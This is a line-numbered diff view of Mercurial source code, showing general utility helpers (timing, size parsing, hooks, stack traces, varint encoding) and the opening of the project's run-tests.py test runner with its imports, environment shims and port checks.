3379 def timed(func):
3379 def timed(func):
3380 '''Report the execution time of a function call to stderr.
3380 '''Report the execution time of a function call to stderr.
3381
3381
3382 During development, use as a decorator when you need to measure
3382 During development, use as a decorator when you need to measure
3383 the cost of a function, e.g. as follows:
3383 the cost of a function, e.g. as follows:
3384
3384
3385 @util.timed
3385 @util.timed
3386 def foo(a, b, c):
3386 def foo(a, b, c):
3387 pass
3387 pass
3388 '''
3388 '''
3389
3389
3390 def wrapper(*args, **kwargs):
3390 def wrapper(*args, **kwargs):
3391 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3391 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3392 result = func(*args, **kwargs)
3392 result = func(*args, **kwargs)
3393 stderr = procutil.stderr
3393 stderr = procutil.stderr
3394 stderr.write(
3394 stderr.write(
3395 b'%s%s: %s\n'
3395 b'%s%s: %s\n'
3396 % (
3396 % (
3397 b' ' * time_stats.level * 2,
3397 b' ' * time_stats.level * 2,
3398 pycompat.bytestr(func.__name__),
3398 pycompat.bytestr(func.__name__),
3399 time_stats,
3399 time_stats,
3400 )
3400 )
3401 )
3401 )
3402 return result
3402 return result
3403
3403
3404 return wrapper
3404 return wrapper
3405
3405
3406
3406
3407 _sizeunits = (
3407 _sizeunits = (
3408 (b'm', 2 ** 20),
3408 (b'm', 2 ** 20),
3409 (b'k', 2 ** 10),
3409 (b'k', 2 ** 10),
3410 (b'g', 2 ** 30),
3410 (b'g', 2 ** 30),
3411 (b'kb', 2 ** 10),
3411 (b'kb', 2 ** 10),
3412 (b'mb', 2 ** 20),
3412 (b'mb', 2 ** 20),
3413 (b'gb', 2 ** 30),
3413 (b'gb', 2 ** 30),
3414 (b'b', 1),
3414 (b'b', 1),
3415 )
3415 )
3416
3416
3417
3417
3418 def sizetoint(s):
3418 def sizetoint(s):
3419 '''Convert a space specifier to a byte count.
3419 '''Convert a space specifier to a byte count.
3420
3420
3421 >>> sizetoint(b'30')
3421 >>> sizetoint(b'30')
3422 30
3422 30
3423 >>> sizetoint(b'2.2kb')
3423 >>> sizetoint(b'2.2kb')
3424 2252
3424 2252
3425 >>> sizetoint(b'6M')
3425 >>> sizetoint(b'6M')
3426 6291456
3426 6291456
3427 '''
3427 '''
3428 t = s.strip().lower()
3428 t = s.strip().lower()
3429 try:
3429 try:
3430 for k, u in _sizeunits:
3430 for k, u in _sizeunits:
3431 if t.endswith(k):
3431 if t.endswith(k):
3432 return int(float(t[: -len(k)]) * u)
3432 return int(float(t[: -len(k)]) * u)
3433 return int(t)
3433 return int(t)
3434 except ValueError:
3434 except ValueError:
3435 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3435 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3436
3436
3437
3437
3438 class hooks(object):
3438 class hooks(object):
3439 '''A collection of hook functions that can be used to extend a
3439 '''A collection of hook functions that can be used to extend a
3440 function's behavior. Hooks are called in lexicographic order,
3440 function's behavior. Hooks are called in lexicographic order,
3441 based on the names of their sources.'''
3441 based on the names of their sources.'''
3442
3442
3443 def __init__(self):
3443 def __init__(self):
3444 self._hooks = []
3444 self._hooks = []
3445
3445
3446 def add(self, source, hook):
3446 def add(self, source, hook):
3447 self._hooks.append((source, hook))
3447 self._hooks.append((source, hook))
3448
3448
3449 def __call__(self, *args):
3449 def __call__(self, *args):
3450 self._hooks.sort(key=lambda x: x[0])
3450 self._hooks.sort(key=lambda x: x[0])
3451 results = []
3451 results = []
3452 for source, hook in self._hooks:
3452 for source, hook in self._hooks:
3453 results.append(hook(*args))
3453 results.append(hook(*args))
3454 return results
3454 return results
3455
3455
3456
3456
3457 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3457 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3458 '''Yields lines for a nicely formatted stacktrace.
3458 '''Yields lines for a nicely formatted stacktrace.
3459 Skips the 'skip' last entries, then return the last 'depth' entries.
3459 Skips the 'skip' last entries, then return the last 'depth' entries.
3460 Each file+linenumber is formatted according to fileline.
3460 Each file+linenumber is formatted according to fileline.
3461 Each line is formatted according to line.
3461 Each line is formatted according to line.
3462 If line is None, it yields:
3462 If line is None, it yields:
3463 length of longest filepath+line number,
3463 length of longest filepath+line number,
3464 filepath+linenumber,
3464 filepath+linenumber,
3465 function
3465 function
3466
3466
3467 Not be used in production code but very convenient while developing.
3467 Not be used in production code but very convenient while developing.
3468 '''
3468 '''
3469 entries = [
3469 entries = [
3470 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3470 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3471 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3471 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3472 ][-depth:]
3472 ][-depth:]
3473 if entries:
3473 if entries:
3474 fnmax = max(len(entry[0]) for entry in entries)
3474 fnmax = max(len(entry[0]) for entry in entries)
3475 for fnln, func in entries:
3475 for fnln, func in entries:
3476 if line is None:
3476 if line is None:
3477 yield (fnmax, fnln, func)
3477 yield (fnmax, fnln, func)
3478 else:
3478 else:
3479 yield line % (fnmax, fnln, func)
3479 yield line % (fnmax, fnln, func)
3480
3480
3481
3481
3482 def debugstacktrace(
3482 def debugstacktrace(
3483 msg=b'stacktrace',
3483 msg=b'stacktrace',
3484 skip=0,
3484 skip=0,
3485 f=procutil.stderr,
3485 f=procutil.stderr,
3486 otherf=procutil.stdout,
3486 otherf=procutil.stdout,
3487 depth=0,
3487 depth=0,
3488 prefix=b'',
3488 prefix=b'',
3489 ):
3489 ):
3490 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3490 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3491 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3491 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3492 By default it will flush stdout first.
3492 By default it will flush stdout first.
3493 It can be used everywhere and intentionally does not require an ui object.
3493 It can be used everywhere and intentionally does not require an ui object.
3494 Not be used in production code but very convenient while developing.
3494 Not be used in production code but very convenient while developing.
3495 '''
3495 '''
3496 if otherf:
3496 if otherf:
3497 otherf.flush()
3497 otherf.flush()
3498 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3498 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3499 for line in getstackframes(skip + 1, depth=depth):
3499 for line in getstackframes(skip + 1, depth=depth):
3500 f.write(prefix + line)
3500 f.write(prefix + line)
3501 f.flush()
3501 f.flush()
3502
3502
3503
3503
3504 # convenient shortcut
3504 # convenient shortcut
3505 dst = debugstacktrace
3505 dst = debugstacktrace
3506
3506
3507
3507
3508 def safename(f, tag, ctx, others=None):
3508 def safename(f, tag, ctx, others=None):
3509 """
3509 """
3510 Generate a name that it is safe to rename f to in the given context.
3510 Generate a name that it is safe to rename f to in the given context.
3511
3511
3512 f: filename to rename
3512 f: filename to rename
3513 tag: a string tag that will be included in the new name
3513 tag: a string tag that will be included in the new name
3514 ctx: a context, in which the new name must not exist
3514 ctx: a context, in which the new name must not exist
3515 others: a set of other filenames that the new name must not be in
3515 others: a set of other filenames that the new name must not be in
3516
3516
3517 Returns a file name of the form oldname~tag[~number] which does not exist
3517 Returns a file name of the form oldname~tag[~number] which does not exist
3518 in the provided context and is not in the set of other names.
3518 in the provided context and is not in the set of other names.
3519 """
3519 """
3520 if others is None:
3520 if others is None:
3521 others = set()
3521 others = set()
3522
3522
3523 fn = b'%s~%s' % (f, tag)
3523 fn = b'%s~%s' % (f, tag)
3524 if fn not in ctx and fn not in others:
3524 if fn not in ctx and fn not in others:
3525 return fn
3525 return fn
3526 for n in itertools.count(1):
3526 for n in itertools.count(1):
3527 fn = b'%s~%s~%s' % (f, tag, n)
3527 fn = b'%s~%s~%s' % (f, tag, n)
3528 if fn not in ctx and fn not in others:
3528 if fn not in ctx and fn not in others:
3529 return fn
3529 return fn
3530
3530
3531
3531
3532 def readexactly(stream, n):
3532 def readexactly(stream, n):
3533 '''read n bytes from stream.read and abort if less was available'''
3533 '''read n bytes from stream.read and abort if less was available'''
3534 s = stream.read(n)
3534 s = stream.read(n)
3535 if len(s) < n:
3535 if len(s) < n:
3536 raise error.Abort(
3536 raise error.Abort(
3537 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3537 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3538 % (len(s), n)
3538 % (len(s), n)
3539 )
3539 )
3540 return s
3540 return s
3541
3541
3542
3542
3543 def uvarintencode(value):
3543 def uvarintencode(value):
3544 """Encode an unsigned integer value to a varint.
3544 """Encode an unsigned integer value to a varint.
3545
3545
3546 A varint is a variable length integer of 1 or more bytes. Each byte
3546 A varint is a variable length integer of 1 or more bytes. Each byte
3547 except the last has the most significant bit set. The lower 7 bits of
3547 except the last has the most significant bit set. The lower 7 bits of
3548 each byte store the 2's complement representation, least significant group
3548 each byte store the 2's complement representation, least significant group
3549 first.
3549 first.
3550
3550
3551 >>> uvarintencode(0)
3551 >>> uvarintencode(0)
3552 '\\x00'
3552 '\\x00'
3553 >>> uvarintencode(1)
3553 >>> uvarintencode(1)
3554 '\\x01'
3554 '\\x01'
3555 >>> uvarintencode(127)
3555 >>> uvarintencode(127)
3556 '\\x7f'
3556 '\\x7f'
3557 >>> uvarintencode(1337)
3557 >>> uvarintencode(1337)
3558 '\\xb9\\n'
3558 '\\xb9\\n'
3559 >>> uvarintencode(65536)
3559 >>> uvarintencode(65536)
3560 '\\x80\\x80\\x04'
3560 '\\x80\\x80\\x04'
3561 >>> uvarintencode(-1)
3561 >>> uvarintencode(-1)
3562 Traceback (most recent call last):
3562 Traceback (most recent call last):
3563 ...
3563 ...
3564 ProgrammingError: negative value for uvarint: -1
3564 ProgrammingError: negative value for uvarint: -1
3565 """
3565 """
3566 if value < 0:
3566 if value < 0:
3567 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3567 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3568 bits = value & 0x7F
3568 bits = value & 0x7F
3569 value >>= 7
3569 value >>= 7
3570 bytes = []
3570 bytes = []
3571 while value:
3571 while value:
3572 bytes.append(pycompat.bytechr(0x80 | bits))
3572 bytes.append(pycompat.bytechr(0x80 | bits))
3573 bits = value & 0x7F
3573 bits = value & 0x7F
3574 value >>= 7
3574 value >>= 7
3575 bytes.append(pycompat.bytechr(bits))
3575 bytes.append(pycompat.bytechr(bits))
3576
3576
3577 return b''.join(bytes)
3577 return b''.join(bytes)
3578
3578
3579
3579
3580 def uvarintdecodestream(fh):
3580 def uvarintdecodestream(fh):
3581 """Decode an unsigned variable length integer from a stream.
3581 """Decode an unsigned variable length integer from a stream.
3582
3582
3583 The passed argument is anything that has a ``.read(N)`` method.
3583 The passed argument is anything that has a ``.read(N)`` method.
3584
3584
3585 >>> try:
3585 >>> try:
3586 ... from StringIO import StringIO as BytesIO
3586 ... from StringIO import StringIO as BytesIO
3587 ... except ImportError:
3587 ... except ImportError:
3588 ... from io import BytesIO
3588 ... from io import BytesIO
3589 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3589 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3590 0
3590 0
3591 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3591 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3592 1
3592 1
3593 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3593 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3594 127
3594 127
3595 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3595 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3596 1337
3596 1337
3597 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3597 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3598 65536
3598 65536
3599 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3599 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3600 Traceback (most recent call last):
3600 Traceback (most recent call last):
3601 ...
3601 ...
3602 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3602 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3603 """
3603 """
3604 result = 0
3604 result = 0
3605 shift = 0
3605 shift = 0
3606 while True:
3606 while True:
3607 byte = ord(readexactly(fh, 1))
3607 byte = ord(readexactly(fh, 1))
3608 result |= (byte & 0x7F) << shift
3608 result |= (byte & 0x7F) << shift
3609 if not (byte & 0x80):
3609 if not (byte & 0x80):
3610 return result
3610 return result
3611 shift += 7
3611 shift += 7
@@ -1,3747 +1,3745 b''
1 #!/usr/bin/env python
1 #!/usr/bin/env python
2 #
2 #
3 # run-tests.py - Run a set of tests on Mercurial
3 # run-tests.py - Run a set of tests on Mercurial
4 #
4 #
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 # Modifying this script is tricky because it has many modes:
10 # Modifying this script is tricky because it has many modes:
11 # - serial (default) vs parallel (-jN, N > 1)
11 # - serial (default) vs parallel (-jN, N > 1)
12 # - no coverage (default) vs coverage (-c, -C, -s)
12 # - no coverage (default) vs coverage (-c, -C, -s)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
14 # - tests are a mix of shell scripts and Python scripts
14 # - tests are a mix of shell scripts and Python scripts
15 #
15 #
16 # If you change this script, it is recommended that you ensure you
16 # If you change this script, it is recommended that you ensure you
17 # haven't broken it by running it in various modes with a representative
17 # haven't broken it by running it in various modes with a representative
18 # sample of test scripts. For example:
18 # sample of test scripts. For example:
19 #
19 #
20 # 1) serial, no coverage, temp install:
20 # 1) serial, no coverage, temp install:
21 # ./run-tests.py test-s*
21 # ./run-tests.py test-s*
22 # 2) serial, no coverage, local hg:
22 # 2) serial, no coverage, local hg:
23 # ./run-tests.py --local test-s*
23 # ./run-tests.py --local test-s*
24 # 3) serial, coverage, temp install:
24 # 3) serial, coverage, temp install:
25 # ./run-tests.py -c test-s*
25 # ./run-tests.py -c test-s*
26 # 4) serial, coverage, local hg:
26 # 4) serial, coverage, local hg:
27 # ./run-tests.py -c --local test-s* # unsupported
27 # ./run-tests.py -c --local test-s* # unsupported
28 # 5) parallel, no coverage, temp install:
28 # 5) parallel, no coverage, temp install:
29 # ./run-tests.py -j2 test-s*
29 # ./run-tests.py -j2 test-s*
30 # 6) parallel, no coverage, local hg:
30 # 6) parallel, no coverage, local hg:
31 # ./run-tests.py -j2 --local test-s*
31 # ./run-tests.py -j2 --local test-s*
32 # 7) parallel, coverage, temp install:
32 # 7) parallel, coverage, temp install:
33 # ./run-tests.py -j2 -c test-s* # currently broken
33 # ./run-tests.py -j2 -c test-s* # currently broken
34 # 8) parallel, coverage, local install:
34 # 8) parallel, coverage, local install:
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
36 # 9) parallel, custom tmp dir:
36 # 9) parallel, custom tmp dir:
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
38 # 10) parallel, pure, tests that call run-tests:
38 # 10) parallel, pure, tests that call run-tests:
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
40 #
40 #
41 # (You could use any subset of the tests: test-s* happens to match
41 # (You could use any subset of the tests: test-s* happens to match
42 # enough that it's worth doing parallel runs, few enough that it
42 # enough that it's worth doing parallel runs, few enough that it
43 # completes fairly quickly, includes both shell and Python scripts, and
43 # completes fairly quickly, includes both shell and Python scripts, and
44 # includes some scripts that run daemon processes.)
44 # includes some scripts that run daemon processes.)
45
45
46 from __future__ import absolute_import, print_function
46 from __future__ import absolute_import, print_function
47
47
48 import argparse
48 import argparse
49 import collections
49 import collections
50 import difflib
50 import difflib
51 import distutils.version as version
51 import distutils.version as version
52 import errno
52 import errno
53 import json
53 import json
54 import multiprocessing
54 import multiprocessing
55 import os
55 import os
56 import random
56 import random
57 import re
57 import re
58 import shutil
58 import shutil
59 import signal
59 import signal
60 import socket
60 import socket
61 import subprocess
61 import subprocess
62 import sys
62 import sys
63 import sysconfig
63 import sysconfig
64 import tempfile
64 import tempfile
65 import threading
65 import threading
66 import time
66 import time
67 import unittest
67 import unittest
68 import uuid
68 import uuid
69 import xml.dom.minidom as minidom
69 import xml.dom.minidom as minidom
70
70
71 try:
71 try:
72 import Queue as queue
72 import Queue as queue
73 except ImportError:
73 except ImportError:
74 import queue
74 import queue
75
75
76 try:
76 try:
77 import shlex
77 import shlex
78
78
79 shellquote = shlex.quote
79 shellquote = shlex.quote
80 except (ImportError, AttributeError):
80 except (ImportError, AttributeError):
81 import pipes
81 import pipes
82
82
83 shellquote = pipes.quote
83 shellquote = pipes.quote
84
84
85 processlock = threading.Lock()
85 processlock = threading.Lock()
86
86
87 pygmentspresent = False
87 pygmentspresent = False
88 # ANSI color is unsupported prior to Windows 10
88 # ANSI color is unsupported prior to Windows 10
89 if os.name != 'nt':
89 if os.name != 'nt':
90 try: # is pygments installed
90 try: # is pygments installed
91 import pygments
91 import pygments
92 import pygments.lexers as lexers
92 import pygments.lexers as lexers
93 import pygments.lexer as lexer
93 import pygments.lexer as lexer
94 import pygments.formatters as formatters
94 import pygments.formatters as formatters
95 import pygments.token as token
95 import pygments.token as token
96 import pygments.style as style
96 import pygments.style as style
97
97
98 pygmentspresent = True
98 pygmentspresent = True
99 difflexer = lexers.DiffLexer()
99 difflexer = lexers.DiffLexer()
100 terminal256formatter = formatters.Terminal256Formatter()
100 terminal256formatter = formatters.Terminal256Formatter()
101 except ImportError:
101 except ImportError:
102 pass
102 pass
103
103
104 if pygmentspresent:
104 if pygmentspresent:
105
105
106 class TestRunnerStyle(style.Style):
106 class TestRunnerStyle(style.Style):
107 default_style = ""
107 default_style = ""
108 skipped = token.string_to_tokentype("Token.Generic.Skipped")
108 skipped = token.string_to_tokentype("Token.Generic.Skipped")
109 failed = token.string_to_tokentype("Token.Generic.Failed")
109 failed = token.string_to_tokentype("Token.Generic.Failed")
110 skippedname = token.string_to_tokentype("Token.Generic.SName")
110 skippedname = token.string_to_tokentype("Token.Generic.SName")
111 failedname = token.string_to_tokentype("Token.Generic.FName")
111 failedname = token.string_to_tokentype("Token.Generic.FName")
112 styles = {
112 styles = {
113 skipped: '#e5e5e5',
113 skipped: '#e5e5e5',
114 skippedname: '#00ffff',
114 skippedname: '#00ffff',
115 failed: '#7f0000',
115 failed: '#7f0000',
116 failedname: '#ff0000',
116 failedname: '#ff0000',
117 }
117 }
118
118
119 class TestRunnerLexer(lexer.RegexLexer):
119 class TestRunnerLexer(lexer.RegexLexer):
120 testpattern = r'[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?'
120 testpattern = r'[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?'
121 tokens = {
121 tokens = {
122 'root': [
122 'root': [
123 (r'^Skipped', token.Generic.Skipped, 'skipped'),
123 (r'^Skipped', token.Generic.Skipped, 'skipped'),
124 (r'^Failed ', token.Generic.Failed, 'failed'),
124 (r'^Failed ', token.Generic.Failed, 'failed'),
125 (r'^ERROR: ', token.Generic.Failed, 'failed'),
125 (r'^ERROR: ', token.Generic.Failed, 'failed'),
126 ],
126 ],
127 'skipped': [
127 'skipped': [
128 (testpattern, token.Generic.SName),
128 (testpattern, token.Generic.SName),
129 (r':.*', token.Generic.Skipped),
129 (r':.*', token.Generic.Skipped),
130 ],
130 ],
131 'failed': [
131 'failed': [
132 (testpattern, token.Generic.FName),
132 (testpattern, token.Generic.FName),
133 (r'(:| ).*', token.Generic.Failed),
133 (r'(:| ).*', token.Generic.Failed),
134 ],
134 ],
135 }
135 }
136
136
137 runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
137 runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
138 runnerlexer = TestRunnerLexer()
138 runnerlexer = TestRunnerLexer()
139
139
140 origenviron = os.environ.copy()
140 origenviron = os.environ.copy()
141
141
142 if sys.version_info > (3, 5, 0):
142 if sys.version_info > (3, 5, 0):
143 PYTHON3 = True
143 PYTHON3 = True
144 xrange = range # we use xrange in one place, and we'd rather not use range
144 xrange = range # we use xrange in one place, and we'd rather not use range
145
145
146 def _bytespath(p):
146 def _bytespath(p):
147 if p is None:
147 if p is None:
148 return p
148 return p
149 return p.encode('utf-8')
149 return p.encode('utf-8')
150
150
151 def _strpath(p):
151 def _strpath(p):
152 if p is None:
152 if p is None:
153 return p
153 return p
154 return p.decode('utf-8')
154 return p.decode('utf-8')
155
155
156 osenvironb = getattr(os, 'environb', None)
156 osenvironb = getattr(os, 'environb', None)
157 if osenvironb is None:
157 if osenvironb is None:
158 # Windows lacks os.environb, for instance. A proxy over the real thing
158 # Windows lacks os.environb, for instance. A proxy over the real thing
159 # instead of a copy allows the environment to be updated via bytes on
159 # instead of a copy allows the environment to be updated via bytes on
160 # all platforms.
160 # all platforms.
161 class environbytes(object):
161 class environbytes(object):
162 def __init__(self, strenv):
162 def __init__(self, strenv):
163 self.__len__ = strenv.__len__
163 self.__len__ = strenv.__len__
164 self.clear = strenv.clear
164 self.clear = strenv.clear
165 self._strenv = strenv
165 self._strenv = strenv
166
166
167 def __getitem__(self, k):
167 def __getitem__(self, k):
168 v = self._strenv.__getitem__(_strpath(k))
168 v = self._strenv.__getitem__(_strpath(k))
169 return _bytespath(v)
169 return _bytespath(v)
170
170
171 def __setitem__(self, k, v):
171 def __setitem__(self, k, v):
172 self._strenv.__setitem__(_strpath(k), _strpath(v))
172 self._strenv.__setitem__(_strpath(k), _strpath(v))
173
173
174 def __delitem__(self, k):
174 def __delitem__(self, k):
175 self._strenv.__delitem__(_strpath(k))
175 self._strenv.__delitem__(_strpath(k))
176
176
177 def __contains__(self, k):
177 def __contains__(self, k):
178 return self._strenv.__contains__(_strpath(k))
178 return self._strenv.__contains__(_strpath(k))
179
179
180 def __iter__(self):
180 def __iter__(self):
181 return iter([_bytespath(k) for k in iter(self._strenv)])
181 return iter([_bytespath(k) for k in iter(self._strenv)])
182
182
183 def get(self, k, default=None):
183 def get(self, k, default=None):
184 v = self._strenv.get(_strpath(k), _strpath(default))
184 v = self._strenv.get(_strpath(k), _strpath(default))
185 return _bytespath(v)
185 return _bytespath(v)
186
186
187 def pop(self, k, default=None):
187 def pop(self, k, default=None):
188 v = self._strenv.pop(_strpath(k), _strpath(default))
188 v = self._strenv.pop(_strpath(k), _strpath(default))
189 return _bytespath(v)
189 return _bytespath(v)
190
190
191 osenvironb = environbytes(os.environ)
191 osenvironb = environbytes(os.environ)
192
192
193 getcwdb = getattr(os, 'getcwdb')
193 getcwdb = getattr(os, 'getcwdb')
194 if not getcwdb or os.name == 'nt':
194 if not getcwdb or os.name == 'nt':
195 getcwdb = lambda: _bytespath(os.getcwd())
195 getcwdb = lambda: _bytespath(os.getcwd())
196
196
197 elif sys.version_info >= (3, 0, 0):
197 elif sys.version_info >= (3, 0, 0):
198 print(
198 print(
199 '%s is only supported on Python 3.5+ and 2.7, not %s'
199 '%s is only supported on Python 3.5+ and 2.7, not %s'
200 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
200 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
201 )
201 )
202 sys.exit(70) # EX_SOFTWARE from `man 3 sysexit`
202 sys.exit(70) # EX_SOFTWARE from `man 3 sysexit`
203 else:
203 else:
204 PYTHON3 = False
204 PYTHON3 = False
205
205
206 # In python 2.x, path operations are generally done using
206 # In python 2.x, path operations are generally done using
207 # bytestrings by default, so we don't have to do any extra
207 # bytestrings by default, so we don't have to do any extra
208 # fiddling there. We define the wrapper functions anyway just to
208 # fiddling there. We define the wrapper functions anyway just to
209 # help keep code consistent between platforms.
209 # help keep code consistent between platforms.
210 def _bytespath(p):
210 def _bytespath(p):
211 return p
211 return p
212
212
213 _strpath = _bytespath
213 _strpath = _bytespath
214 osenvironb = os.environ
214 osenvironb = os.environ
215 getcwdb = os.getcwd
215 getcwdb = os.getcwd
216
216
217 # For Windows support
217 # For Windows support
218 wifexited = getattr(os, "WIFEXITED", lambda x: False)
218 wifexited = getattr(os, "WIFEXITED", lambda x: False)
219
219
220 # Whether to use IPv6
220 # Whether to use IPv6
221 def checksocketfamily(name, port=20058):
221 def checksocketfamily(name, port=20058):
222 """return true if we can listen on localhost using family=name
222 """return true if we can listen on localhost using family=name
223
223
224 name should be either 'AF_INET', or 'AF_INET6'.
224 name should be either 'AF_INET', or 'AF_INET6'.
225 port being used is okay - EADDRINUSE is considered as successful.
225 port being used is okay - EADDRINUSE is considered as successful.
226 """
226 """
227 family = getattr(socket, name, None)
227 family = getattr(socket, name, None)
228 if family is None:
228 if family is None:
229 return False
229 return False
230 try:
230 try:
231 s = socket.socket(family, socket.SOCK_STREAM)
231 s = socket.socket(family, socket.SOCK_STREAM)
232 s.bind(('localhost', port))
232 s.bind(('localhost', port))
233 s.close()
233 s.close()
234 return True
234 return True
235 except socket.error as exc:
235 except socket.error as exc:
236 if exc.errno == errno.EADDRINUSE:
236 if exc.errno == errno.EADDRINUSE:
237 return True
237 return True
238 elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
238 elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
239 return False
239 return False
240 else:
240 else:
241 raise
241 raise
242 else:
242 else:
243 return False
243 return False
244
244
245
245
246 # useipv6 will be set by parseargs
246 # useipv6 will be set by parseargs
247 useipv6 = None
247 useipv6 = None
248
248
249
249
250 def checkportisavailable(port):
250 def checkportisavailable(port):
251 """return true if a port seems free to bind on localhost"""
251 """return true if a port seems free to bind on localhost"""
252 if useipv6:
252 if useipv6:
253 family = socket.AF_INET6
253 family = socket.AF_INET6
254 else:
254 else:
255 family = socket.AF_INET
255 family = socket.AF_INET
256 try:
256 try:
257 s = socket.socket(family, socket.SOCK_STREAM)
257 s = socket.socket(family, socket.SOCK_STREAM)
258 s.bind(('localhost', port))
258 s.bind(('localhost', port))
259 s.close()
259 s.close()
260 return True
260 return True
261 except socket.error as exc:
261 except socket.error as exc:
262 if exc.errno not in (
262 if exc.errno not in (
263 errno.EADDRINUSE,
263 errno.EADDRINUSE,
264 errno.EADDRNOTAVAIL,
264 errno.EADDRNOTAVAIL,
265 errno.EPROTONOSUPPORT,
265 errno.EPROTONOSUPPORT,
266 ):
266 ):
267 raise
267 raise
268 return False
268 return False
269
269
270
270
271 closefds = os.name == 'posix'
271 closefds = os.name == 'posix'
272
272
273
273
274 def Popen4(cmd, wd, timeout, env=None):
274 def Popen4(cmd, wd, timeout, env=None):
275 processlock.acquire()
275 processlock.acquire()
276 p = subprocess.Popen(
276 p = subprocess.Popen(
277 _strpath(cmd),
277 _strpath(cmd),
278 shell=True,
278 shell=True,
279 bufsize=-1,
279 bufsize=-1,
280 cwd=_strpath(wd),
280 cwd=_strpath(wd),
281 env=env,
281 env=env,
282 close_fds=closefds,
282 close_fds=closefds,
283 stdin=subprocess.PIPE,
283 stdin=subprocess.PIPE,
284 stdout=subprocess.PIPE,
284 stdout=subprocess.PIPE,
285 stderr=subprocess.STDOUT,
285 stderr=subprocess.STDOUT,
286 )
286 )
287 processlock.release()
287 processlock.release()
288
288
289 p.fromchild = p.stdout
289 p.fromchild = p.stdout
290 p.tochild = p.stdin
290 p.tochild = p.stdin
291 p.childerr = p.stderr
291 p.childerr = p.stderr
292
292
293 p.timeout = False
293 p.timeout = False
294 if timeout:
294 if timeout:
295
295
296 def t():
296 def t():
297 start = time.time()
297 start = time.time()
298 while time.time() - start < timeout and p.returncode is None:
298 while time.time() - start < timeout and p.returncode is None:
299 time.sleep(0.1)
299 time.sleep(0.1)
300 p.timeout = True
300 p.timeout = True
301 if p.returncode is None:
301 if p.returncode is None:
302 terminate(p)
302 terminate(p)
303
303
304 threading.Thread(target=t).start()
304 threading.Thread(target=t).start()
305
305
306 return p
306 return p
307
307
308
308
309 if sys.executable:
309 if sys.executable:
310 sysexecutable = sys.executable
310 sysexecutable = sys.executable
311 elif os.environ.get('PYTHONEXECUTABLE'):
311 elif os.environ.get('PYTHONEXECUTABLE'):
312 sysexecutable = os.environ['PYTHONEXECUTABLE']
312 sysexecutable = os.environ['PYTHONEXECUTABLE']
313 elif os.environ.get('PYTHON'):
313 elif os.environ.get('PYTHON'):
314 sysexecutable = os.environ['PYTHON']
314 sysexecutable = os.environ['PYTHON']
315 else:
315 else:
316 raise AssertionError('Could not find Python interpreter')
316 raise AssertionError('Could not find Python interpreter')
317
317
318 PYTHON = _bytespath(sysexecutable.replace('\\', '/'))
318 PYTHON = _bytespath(sysexecutable.replace('\\', '/'))
319 IMPL_PATH = b'PYTHONPATH'
319 IMPL_PATH = b'PYTHONPATH'
320 if 'java' in sys.platform:
320 if 'java' in sys.platform:
321 IMPL_PATH = b'JYTHONPATH'
321 IMPL_PATH = b'JYTHONPATH'
322
322
323 defaults = {
323 defaults = {
324 'jobs': ('HGTEST_JOBS', multiprocessing.cpu_count()),
324 'jobs': ('HGTEST_JOBS', multiprocessing.cpu_count()),
325 'timeout': ('HGTEST_TIMEOUT', 180),
325 'timeout': ('HGTEST_TIMEOUT', 180),
326 'slowtimeout': ('HGTEST_SLOWTIMEOUT', 1500),
326 'slowtimeout': ('HGTEST_SLOWTIMEOUT', 1500),
327 'port': ('HGTEST_PORT', 20059),
